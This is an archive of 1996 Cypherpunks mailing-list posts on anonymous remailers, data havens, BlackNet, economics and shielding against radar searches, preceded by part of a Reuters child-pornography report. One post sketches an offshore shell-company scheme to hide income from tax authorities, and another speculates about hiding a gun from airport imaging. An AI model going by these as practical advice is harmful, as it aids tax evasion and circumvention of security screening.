"Neglecting to prohibit computer generated images could well re-establish the commercial trade -- filling bookstores with computer images, de-sensitizing society
and fueling demand for such material," said campaigner Margaret Healy from Bangkok-based End Child Prostitution in Asian Tourism (ECPAT). 

Tyler said the Internet has ended the days when pedophiles had to make costly cross-border runs to buy child pornography in countries where laws were laxer and
penalties lighter. 

Now they can obtain and distribute films and photos from their own homes on the Internet with little risk of capture. 

Tyler said the existence of anonymous re-mailers -- computer systems which accept material transmitted over computer lines and send it out again after coding its
original address -- concealed the source of pornography on the Internet. 

"Before on-line sex material was available, you'd to find someone to sell it to you, trade with you, or produce it yourself. The net provides a very high level of
safety." 

Short of denying people access to the network, he added, there was little to be done. Even convicted pedophiles with access to computers in prisons can get the
material. 

However computer experts agree the existence of just one re-mailing system in a country with more lax laws is enough for the global distribution of child
pornography on the Internet. 

Tyler said the most widely used re-mailing system currently operates from Finland, through which about 99 percent of all child pornography with untraceable
address codes passes. 

But Johan Helsingius, who runs a re-mailing system from Helsinki, said he did not think child pornography was a problem on the Internet or that any of the 10,000
messages which pass through his server daily contained child pornography. 

"To a large extent the net is self-regulating. As soon as you do something that offends enough people, measures will be taken by those who are involved with the
net," he said. 

ECPAT's Healy said in a report prepared for the five-day Stockholm conference that opens on August 27 that the regulation of child pornography on computers
presents special challenges and called on governments to fund better training. 

"The establishment of an international research organization with...specialists in the areas of investigation, law enforcement, behavioral science, prosecution, law and
computer technology could be an invaluable resource for the global community," Healy said. 

Copyright, Reuters Ltd. All rights reserved 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 16 Aug 1996 10:45:09 +0800
To: cypherpunks@toad.com
Subject: Floating DataHaven
In-Reply-To: <Pine.LNX.3.91.960815185647.16282D@offshore>
Message-ID: <Pine.LNX.3.91.960815194218.16207H-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



William Knowles <erehwon@c2.org>
> 
> Something that I thought would make an excellent data haven would
> be older offshore oil platforms,
> [...]
> You have to wonder how cheap these could sell 
> for just to get them off the oil companies hands? 

A floating DataHaven is probably the way to get the ultimate in 
freedom.  

There is someone on Anguilla that bought a used floating oil platform for
$1 million.  It is big enough for 200 people to live on.  It is not here,
so I have not seen it. 

There is someone else here who says that there are some really old ones
that you can get just for hauling them away. Some countries will not let
owners just sink them. 

You can get Internet via radio links for reasonable prices.  And via
satellite for almost affordable prices.  When Bill Gates 900 satellites
get up there it should be very affordable. 

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 16 Aug 1996 12:19:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <Pine.SUN.3.94.960815132043.1400B-100000@polaris>
Message-ID: <Pine.LNX.3.93.960815195125.154A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Black Unicorn wrote:
> you to make their comments public.  That's called an endorsement, and, by
> the way, people are usually paid for them.  Sometimes in the millions.
> Think Michael Jordan is getting a deal when you use his name to promote
> your product and then give him a $99.00 piece of software (which is
> effectively worth the amount of time it takes to write a few kiss ass
> paragraphs on the software, not $99.00)?
> 

     The time it takes M. Jordon to write a couple of paragraphs would 
be worth at least $99.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 14:26:39 +0800
To: cypherpunks@toad.com
Subject: BlackNet as a Distributed, Untraceable, Robust Data Haven
Message-ID: <ae3939990d0210040b0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 AM 8/16/96, Greg Kucharo wrote:
>The only ideal I can think of would be the fictional "Port Watson".  What
>is you had a system that spanned countries, using the internet as a linking
>device.  It would be the same service.  But when you specified the kind of
>data you wanted to post, the system would route it to the appropriate
>server in a country where it wasn't illegal.
>

I have to speak up here and say that there is an actual working exemplar of
a distributed, untraceable data haven. While it lacks a robust _payment_
mechanism, that is also untraceable, so does the "Visit Port Watson"
example (which has never actually existed).

The simple structure I built in 1993 for "BlackNet" actually works. It has
been discussed in many places, and will be the subject of a couple of
sections in Peter Ludlow's new book, "High Noon on the Electronic Frontier"
(http://www-mitpress.mit.edu/mitp/recent-books/comp/ludph.html).

Features of relevance to any discussion of data havens:

* messages are posted to message pools, including any of the 18,000+ Usenet
groups copied automatically in sites around the world.

* the initial messages are in plaintext, of course, as how else could
readers determine which are of interest to them? "Anyone have details of
the medical condition of Chirac?" might be an example.

* a public key is posted along with the plaintext, thus allowing a reader
to respond _privately_ by encrypting his message to the public key and
posting it (through a chain of remailers and eventually to a mail-to-News
gateway, for example).

* this establishes two-way communication, in a "black pipe" that is visible
to all, but opaque to all but the parties.

* if some jurisdictions attempts to cut off a particular newsgroup, e.g.,
"alt.anonymous.messages," then the traffic can be shifted to other
newsgroups, e.g., "talk.politics.singapore."

* posting can be as untraceable as a chain of remailers linked to a
mail-to-News gateway can be.

* thus, two agents can establish a communications channel between
themselves without knowing the identity or location or jurisdiction of each
other.

(There are some subtle issues of man-in-the-middle attacks, as with these
sorts of protocols for establishing communication between parties who have
not met; webs of trust, again. For the several cases of communications
using BlackNet I was personally involved with, mostly in '93, this did not
ever become a problem any of us were aware of.)

* as I mentioned, BlackNet lacks a robust, untraceable payment system.
Alice and Bob may be able to connect up with each other, by exchanging
reciprocally encrypted messages in a public place, but transferring money
is problematic. (I don't know just how well the Mark Twain/Digicash stuff
really works at this time....someone motivated to actually transfer money
would be a better judge, along with the several cryptographers on this list
who've looked at it more recently and in more depth than I have.)

The important thing to note is that BlackNet, and similar systems, do not
depend on any particular jurisdiction or site to host the communications.
The anarchic, distributed Usenet is used. (And there is no reason why
mailing lists, a la Miron Cuperman's message pool list of a few years back,
or the Web itself could not be used. Using a Web site does potentially open
the owner of the URL site to charges of conspiracy, though the fact that
the messages are encrypted (after the early plaintext.)

There are certainly things yet to be done, but it's important that the
example of BlackNet be mentioned.

Solve the payment problem (for real, not the semi-GAKked version of
Digicash that Chaum now appears to be promoting) and there's no need for
"physical" data havens in Anguilla, Burma, St. Barts, Lichtenstein, or
wherever.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Fri, 16 Aug 1996 14:21:27 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <Pine.SV4.3.91.960815205619.3926A-100000@larry.infi.net>
Message-ID: <3213F1FB.74FB@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz wrote:
> 
> I repeat.  Generations of sweating engineers have discovered and confirmed
> that there is not an easy, "Silver Bullet" cure of the canonical problem
> of shielding electromagnetic energy from reaching someone who knows how
> to interpret it.
> 
> Bill, you are welcome to look at a layer of tin foil and give a sigh of
> relief that you've shielded your gun or your crypto diskette or your
> private body parts feom someone who knows what they're doing.  Go ahead,
> chant a mantra too, if it makes you feel better.

Shielding EMF/ELF is very difficult. I had a customer who had a wobbly
monitor and the solutions just to shield the monitor from some ELF
interference was in the $1k range. Check out this site:
http://www.noradcorp.com/faq1.htm
A little primer on ELF radiation. And putting foil in the wall will do
nothing except possibly spreading the radiation to a wider area. (Like
using frosted glass. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 16 Aug 1996 11:12:33 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <199608150454.AAA18471@mh004.infi.net>
Message-ID: <Pine.SV4.3.91.960815205619.3926A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I repeat.  Generations of sweating engineers have discovered and confirmed 
that there is not an easy, "Silver Bullet" cure of the canonical problem 
of shielding electromagnetic energy from reaching someone who knows how 
to interpret it.

Bill, you are welcome to look at a layer of tin foil and give a sigh of 
relief that you've shielded your gun or your crypto diskette or your 
private body parts feom someone who knows what they're doing.  Go ahead, 
chant a mantra too, if it makes you feel better.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 14:27:52 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: Jurisdictionless Distributed Data Havens
Message-ID: <199608160415.VAA00103@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 8/15/96 -0500, "Douglas R. Floyd" <dfloyd@io.com> wrote:
>As of now, I am looking for someone who can help me implement a redundant
>controller system, so when the DH is contacted, even if the first one if
>smashed, the "RAID" stays operable.

One approach is "Just Don't Do It" - let the user (or user interface program)
handle the RAID work.  You can get fancy and use Shamir Secret Sharing,
or non-fancy and use N+1 sparing RAID, or medium fancy and use
{<even-bits>,<odd-bits>,<evens xor odds>}, depending on how private
and how reliable you want to be.  Having just the even bits of 
decently-encrypted cyphertext makes cracking tough....

Some issues to think about -
- Access patterns - who do you want to be able to retrieve the data?
--- only the owner?  --- people who the owner shares a secret with?
--- Everybody?  --- Everybody who knows where the pieces are?
--- One retrieval?  Many retrievals?  
- How do you want the data delivered?  Anon remailer?  HTTP?  POP3?
- Threats - who don't you want to be able to read the data?
--- who don't you want to be able to delete the data?
--- who don't you want to find out who retrieved the data?
- Payment - who pays?  Writers?  Readers?  Cops with warrants?  
  Account holders or one-shot users?  Digicash only?  How much?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Fri, 16 Aug 1996 07:25:51 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8AF2.52CFF620@groningen10.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:

>Are you the one putting up the objections?  Are you the one who does not
want to see the proof which you are asking for?  I would think that
after having read Mises, Hayek, et al, the economic cause&effect
principles which they outlined would make the resulting situation pretty
clear.

   ..
Blanc<

 If the situation is so clear, why can't you give the proof I'm asking for?

Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Fri, 16 Aug 1996 07:06:23 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8AF2.6C7BEC00@groningen10.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:


>From: 	Bart  Croughs
You haven't answered this question yet. I don't claim that the U.S. is worse off when US capital moves abroad. I only ask: how can you proof that the US isn't worse off when US capital moves abroad?< 

Simple. Keeping capital from flowing wherever it likes leads to a non-pareto
optimal state. Care to dispute that?

Perry

-	-	-	-	-	-	-	-	-	

For those who don't know what the Pareto optimum is: it's an allocation of resources such that no one can be made better off without someone else being made worse off. 
So what you say is that you can't keep capital from flowing wherever it likes without someone being made worse off. Of course I do not dispute this; obviously, the US investors will be worse off when you forbid them to invest where they want to invest. But this is not a proof that the rest of the US citizens will not be worse off when American investors decide to invest abroad. And that is the proof I'm asking for.

Bart Croughs









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 15:12:25 +0800
To: cypherpunks@toad.com
Subject: Re: remailers/kiddie porn
Message-ID: <199608160454.VAA00547@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>"The Internet is like heaven for the pedophile," said Toby Tyler, 
>a United States police officer who lectures at the FBI Academy on child abuse. 
...
>However computer experts agree the existence of just one re-mailing system
in a country with more lax laws is enough for the global distribution of child
>pornography on the Internet. 
>Tyler said the most widely used re-mailing system currently operates from
Finland, through which about 99 percent of all child pornography with
untraceable
>address codes passes. 

Classic governmental statistics abuse.  Given that probably far over 99% 
of all untraceable remailer return addresses are on Penet,
it's no surprise that 99% of all material with untraceable
destination addresses goes through there...
The largest userid number I've seen on Penet was about 500,000,
and I doubt there are 5000 addresses on nymservers or
reply-block users.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Fri, 16 Aug 1996 14:53:12 +0800
To: <cypherpunks@toad.com>
Subject: Physical Havens
Message-ID: <199608160453.VAA07570@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Let's take a look at the successful havens of history.

1.  Hashishim( Old man of the mountains)-The Aga Khan survived thousands of
years of harassment by the surrounding powers by placing a few well choosen
daggers.
2. The monastic system- These whole setup was an excellent model.  The
monks were burrowed away in those places for centuries.  The church built
them like fortresses to withstand the heathens, both mentally and
physically.  The original "data warehouse".
3. The pirate havens- Places like the carribbean(originally), then
Madagasgar(last).  Pirate havens did business for everyone.
4. The silk routes- The trading centers of the old silk road sprang up
overnight then vanished.  Original anonymous trade.
  All of these physical havens eventually fell to the persistance of the
major powers of the day. Or were co-opted by others who absorbed the
critical black market features of these systems.
???????????????????????????????????????
Greg Kucharo
sophi@best.com
"Eppur si moeve" -Galileo
???????????????????????????????????????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 13:49:53 +0800
To: erehwon@c2.org (William Knowles)
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.SUN.3.94.960815104107.8090A-100000@infinity.c2.net>
Message-ID: <199608160257.VAA20466@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Thu, 15 Aug 1996, Arun Mehta wrote:
> 
> > I'm sure this has come up before, but what would prevent a server
> > being located on a buoy or something at sea outside territorial
> > limits (or when satellites become cheaper, on a satellite itself)
> > offering such services?  
> 
> Something that I thought would make an excellent data haven would
> be older offshore oil platforms, Their size would allow extended
> living periods, electrcity and communications are in place, They
> are generally built outside of the territorial waters of most
> countries to avoid any damage to the shorelines if oil spilled
> (possibility for becoming its own country?) and with the hoops
> that Shell Oil went through to please Greenpeace with its last
> oil platform.  You have to wonder how cheap these could sell 
> for just to get them off the oil companies hands? 
> 
> Comments or suggestions?
> 
> William Knowles
> erehwon@c2.org

(The machine crashed when I was writing this letter, so if cpunks got two,
I apologize.)

How would this rig be defended?

Pirates still exist.  Even if you can give them something to think about
with a 30/06 bullet at their waterline, there are always small countries
who have navies that can be hired.  They may be small and defenseless
compared to the US navy, but against a basically unarmed oil rig, do have
the ability to sink the rig at their whim.

Its ironic that I am playing Devil's Advocate with data havens, but have
the only working input/output code for one that I know of.  (I have been
having problems with it, so until I work some bugs out I haven't put it
for offer via FTP.)

I think for now try to make something that uses the same technology as a
data haven -- An offsite secure storage server.  Discussed in this list
about a year ago, this uses data haven code, and is equivalent to a
sufferance remailer, but at least these can exist.  The first step is
having them exist overtly first, and having "terms of service", then
working on DC-nets, "RAID" DH's, etc.

I have a tokenlike system -- "Storage Noodles", but haven't gotten it
working reliably yet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 16 Aug 1996 07:41:25 +0800
To: Jeremey Barrett <jeremey@forequest.com>
Subject: Re: PGP/Unix scripts, mail proggies?
In-Reply-To: <Pine.BSI.3.93.960815110720.16514A-100000@descartes.forequest.com>
Message-ID: <199608152007.WAA12491@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have an sh script to automate PGP usage, available for 50
cents in Ecash from "http://www.c2.net/~bryce/BAP.html" or for
free by e-mailing me and asking politely.  BAP is simple enough
that my mother can use it, and functional enough that I use it.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMhODZUjbHy8sKZitAQGr1AL+LjpppE77K8qNhcpblSI178BfC/hRBQ8u
MM63n006/i0oSqsvybB5VrKp8U25bjYERH1xNVaGynZQVT7UME+qlFK6qdfo+Wbg
5OkPOqOPz4wN28MQ6M87NdHoJM97nDjj
=Bn+w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 15:57:27 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches [NOISE]
Message-ID: <199608160545.WAA01166@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:01 PM 8/15/96 -0400, you wrote:
>I repeat.  Generations of sweating engineers have discovered and confirmed 
>that there is not an easy, "Silver Bullet" cure of the canonical problem 
>of shielding electromagnetic energy from reaching someone who knows how 
>to interpret it.

I also repeat - the problem isn't TEMPEST, which I agree is a tough
problem.  The problem is preventing radar imaging from detecting the
shape of metal stuff you're carrying, and shielding with a sufficiently
thick layer of metal should do that.  I don't know, for the technology
they're using, if this means tinfoil-thickness or armor-plate thickness,
but random-thickness metal should help.  Of course, walking through
the airport wearing plate armor will probably disturb the security
guards more than mere chain-mail :-)

>Bill, you are welcome to look at a layer of tin foil and give a sigh of 
>relief that you've shielded your gun or your crypto diskette or your 
>private body parts feom someone who knows what they're doing.  Go ahead, 
>chant a mantra too, if it makes you feel better.

I've always enjoyed the one that goes
        You have the right to remain silent.
        Anything you say can and will be used against you in a court of law.
        You have the right to an attorney.
        If you cannot afford one, one will be provided for you.
        License and registration, please.
        Go to jail.  Go directly to jail.
        It's not a threat, it's just a choice you can make.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 16:06:12 +0800
To: cypherpunks@toad.com
Subject: Re: Burden of proof
Message-ID: <199608160545.WAA01171@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 PM 8/15/96 -0700, DAVID A MOLNAR <molnard1@nevada.edu> wrote:
>	What is to stop the IRS from pointing out that you received the 
>money from your employer? 

What employer?  What money?  Some Anguillan consulting bodyshop
sent some guys who did the work, and MegaCo paid the bodyshop.
The shop paid the guys some typical low wages, and also
bought computer services from another Anguillan company,
which deposited its profits in its bank account in Jersey.
Employee Jean D'Eau used the company Visa card for the account 
and took some business trips to San Diego, stayed in 
a hotel in Seattle, rented cars, ate out, bought computer toys at
47th St. Computer, paid for his Netcom account,
and got a Visa Cash advance in Jamaica.  No problem, mon.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 16 Aug 1996 13:05:46 +0800
To: cypherpunks@toad.com
Subject: Re: Floating DataHaven
In-Reply-To: <Pine.LNX.3.91.960815194218.16207H-100000@offshore>
Message-ID: <Pine.LNX.3.91.960815224139.16736A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




In the September 1996 Yahoo! Internet Life, page 11, Spencer Reiss 
writes of Vince Cate:

> But his true dream is to take his whole set-up really offshore.  "It 
> would be interesting to have a nice big boat to travel around on," he 
> says. "You know, the prices for satellite transmitters are really coming 
> down.  There's no real reason to be anywhere, anymore."

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 16 Aug 1996 16:24:32 +0800
To: rpowell@algorithmics.com
Subject: implausible defenses & tax havens
Message-ID: <2.2.32.19960816060630.006dc138@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:15 PM 8/15/96 -0400, Robin Powell wrote:

>This relates to something I have been wondering about:  If one could
>get one's company to pay one in electronic cash, what is to stop one
>from piling the coins in a Datahaven somewhere (assuming one existed
>that would be usable for these purposes) and say to the IRS: Money?
>What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
>that's it!!

This scenario is more or less the same as being paid in paper cash and then
hiding the paper cash. That's not an especially sophisticated tax evasion
tactic. 

If you were on a jury, and you heard a defendant testify that they worked at
a job site (either as an employee or a contractor) for years without ever
being paid, and that they managed to maintain a lifestyle consistent with
full-time work without ever receiving taxable income (whether as wages or
dividends or interest or ..), and that the HR/personnel/AP people who
testified that the defendant had been paid were mistaken or lying .. would
you believe that testimony?

Winning in court takes a lot more than making up a conceivable but
incredibly implausible chain of events to explain away incriminating
circumstances. (* OJ and other cases of nullification notwithstanding. But
precious few people have the $ to pay for the kind of defense work needed to
get that sort of result.) The notion of "burden of proof" is important, and
defense lawyers can jawbone about it for hours - but the bottom line is that
the "I don't know anything about getting any money" defense is bullshit. If
the jurors can't imagine themselves or their kids or their friends doing
what you're claiming you did (working without being paid and with no
expectation of being paid), you lose. 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 16 Aug 1996 10:16:18 +0800
To: cypherpunks@toad.com
Subject: RAD_ius
Message-ID: <199608152343.XAA18395@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-14-96. NW: 
 
   "Proposed IETF standard to ease a variety of remote 
   access concerns ." 
 
      The scheme, called Remote Authentication Dial-In User 
      Service (RADIUS), provides a centralized and secure 
      method for authenticating remote dial-in users, 
      authorizing appropriate enterprise resources and 
      gathering accounting details. RADIUS also provides a 
      way to integrate the security administration of 
      dial-in users with that of the resident enterprise 
      population. 
 
   ----- 
 
   http://jya.com/radius.txt  (5 kb) 
 
   RAD_ius 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 15:12:55 +0800
To: molnard1@nevada.edu (DAVID A MOLNAR)
Subject: Re: Burden of proof
In-Reply-To: <Pine.OSF.3.91.960815172937.17110A-100000@pioneer.nevada.edu>
Message-ID: <199608160445.XAA07083@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> > This relates to something I have been wondering about:  If one could
> > get one's company to pay one in electronic cash, what is to stop one
> > from piling the coins in a Datahaven somewhere (assuming one existed
> > that would be usable for these purposes) and say to the IRS: Money?
> > What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
> > that's it!!
> 	What is to stop the IRS from pointing out that you received the 
> money from your employer? Maybe you could convince them you were unable 
> to pay, but that would require squirreling away(and refraining from 
> using) all your assets. 
> 
> 

FYI:  Cheating on an IRS tax return is considered the same as not filing
one -- there is NO statute of limitations.  This means if you place your
money in a money/data haven, and spend it 20 years later, you can still be
nabbed for tax evasion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: distribution-request@sevenlocks.com
Date: Sun, 18 Aug 1996 06:21:22 +0800
To: "Distribution List" <distribution@sevenlocks.com>
Subject: distribution Digest - V01 #02
Message-ID: <19960816000246.a29add4e.in@wwwserver.cqi.com>
MIME-Version: 1.0
Content-Type: text/plain


distribution Digest    Fri, 16 Aug 1996 00:01:50 Eastern Daylight Time   V01 #02

Today's topics:
     'new security information available'
     'new security information available'

----------------------------------------------------------------------

Date: Thu, 15 Aug 1996 21:19:11 Eastern Daylight Time
From: "Dstang" <dstang@sevenlocks.com>
Subject: new security information available


Dear Security Colleague:

I would like to invite you to subscribe to SecurityDigest, a new, free
bi-monthly electronic newsletter, devoted to security news, issues and
trends.  Every issue of SecurityDigest is delivered to your desktop (or
laptop) with the latest security news and information you need, in a
clear and concise e-mail format.

Subscribe now by sending an e-mail message to listserver@sevenlocks.com
containing the string "subscribe securitydigest."  Or view the charter
issue of SecurityDigest on Safe@Home, Seven Locks Software's Web site
(http://www.sevenlocks.com/SecurityDigest.htm), where you can also
secure your free subscription.

Sincerely,
David J. Stang
President and CEO
Seven Locks Software, Inc.

------------------------------

Date: Thu, 15 Aug 1996 21:19:26 Eastern Daylight Time
From: "Dstang" <dstang@sevenlocks.com>
Subject: new security information available


Dear Security Colleague:

I would like to invite you to subscribe to SecurityDigest, a new, free
bi-monthly electronic newsletter, devoted to security news, issues and
trends.  Every issue of SecurityDigest is delivered to your desktop (or
laptop) with the latest security news and information you need, in a
clear and concise e-mail format.

Subscribe now by sending an e-mail message to listserver@sevenlocks.com
containing the string "subscribe securitydigest."  Or view the charter
issue of SecurityDigest on Safe@Home, Seven Locks Software's Web site
(http://www.sevenlocks.com/SecurityDigest.htm), where you can also
secure your free subscription.

Sincerely,
David J. Stang
President and CEO
Seven Locks Software, Inc.

------------------------------


End of distribution Digest V01 #02
**********************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 16 Aug 1996 17:44:30 +0800
To: cypherpunks@toad.com
Subject: Re:BlackNet as a Distributed, Untraceable, Robust Data Haven
Message-ID: <v02140b01ae39deb35eab@[204.179.131.136]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
>
> I have to speak up here and say that there is an actual working exemplar of
> a distributed, untraceable data haven. While it lacks a robust _payment_
> mechanism, that is also untraceable, so does the "Visit Port Watson"
> example (which has never actually existed)

BlackNet also lacks any sense of persistence.  A message posted lives at
the whim of newsgroup expiration policies and getting a copy of an expired
message is a non-trivial task.  It is also not an overt data haven, there
is really no address or pointer you can direct someone to and say "look
here."  Usenet as a data haven is like dropping messages in to bottles
and casting them in to the sea; getting it where you want and having the
intended recipient be able to find the data easily is still an unsolved
problem.  It is a bulletin board for establishing private two-party
communications on any topic, but it is not even close to being a mechanism
for "publishing" in the manner to which people have becomed accostomed to on
the net.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 19:06:53 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <199608160821.BAA02713@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column
8/8/96
>>It makes me ill to agree with Schlafly on any issue, but 
>>'Even a stopped clock.......
>>Unrepentant Liberial
>
>It does seem really odd, doesn't it?  But look at it this way:  The only 
>reason the knuckle-dragging conservatives are able to take the moral 
>high-ground on this and other net-freedom issues is because the OTHER 
>"unrependant liberals" have inexplicably abandoned the correct side of the 
>argument.  The fact that the conservatives are right may seem odd, but the 
>behavior of the liberals is truly astonishing.

Liberals?  What Liberals?  Clinton's certainly no liberal;
he's just a big-spending statist who likes to buy votes from
poor, middle-class, and yuppie voters rather than buying them
from defense contractors, not that he's above that.
The only thing about him that's more liberal than George Bush,
whose Clipper chips and miscellaneous wars Clinton inherited,
is that Clinton smiles when he's lying instead of sneering like Bush.

(If Clinton had said things like "Of course I tried to avoid the draft
and smoked dope, I'm no fool" and had dropped the draft and the Drug War
instead of supporting both after he was President, I might have
a better opinion of him....)

However, if Phyllis Schlafly understands that the tools she needs
to protect her speech are the same that people she disapproves of
can use to protect their speech, and is willing to make that trade,
she's starting to inhale, and good for her!

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 16 Aug 1996 19:11:41 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Geek Apartments and Etherpunks
Message-ID: <199608160833.BAA02793@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 AM 8/14/96 -0400, Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:

>Most manufacturers offer SNMP-manageable hubs, but these don't offer 
>MAC-layer security. That usually costs a lot extra. The MAC-layer feature 
>is not widely used.

AT&T was about the first vendor with that feature.
Aside from solving a _lot_ of potential security problems,
it was very convenient for finding out what device really
_was_ connected to what hub port - the hub recorded the most recent
MAC address received on each port, and you could compare that to
ARP tables and untangle lots of problems.  Not as fancy as a Sniffer,
but let you do things that a Sniffer on ThinWire couldn't.

(Of course, since it wasn't NSA-rated, the fact that it actually did
solve security problems didn't give us extra slack on government jobs
that needed it. )

